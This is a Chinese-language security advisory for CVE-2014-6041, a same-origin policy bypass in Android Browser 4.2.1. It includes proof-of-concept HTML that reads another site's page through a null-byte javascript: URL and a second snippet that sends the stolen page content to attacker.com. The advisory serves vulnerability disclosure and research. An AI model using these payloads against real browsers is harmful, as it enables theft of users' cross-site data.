发布日期:2014-09-02
更新日期:2014-09-19
受影响系统:
Google Android Browser 4.2.1
描述:
BUGTRAQ ID: 69548
CVE(CAN) ID: CVE-2014-6041
Android是基于Linux开放性内核的操作系统,是Google公司在2007年11月5日公布的手机操作系统。
Android浏览器应用4.2.1版本在实现上存在安全限制绕过漏洞,远程攻击者通过包含\u0000字符的构造属性,利用此漏洞可绕过同源策略。
<*来源:Rafay Baloch
链接:
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Rafay Baloch ()提供了如下测试方法:
*Reading the response*
You can read the response of any page by accessing the
document.body.innerHTML property.
<iframe src="https://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')"
>
*Stealing the response and sending it to an attackers domain*
In real world situation an attacker would send the response to his
controlled domain.
<iframe src="https://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//
attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')"
>
建议:
厂商补丁:
Google
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: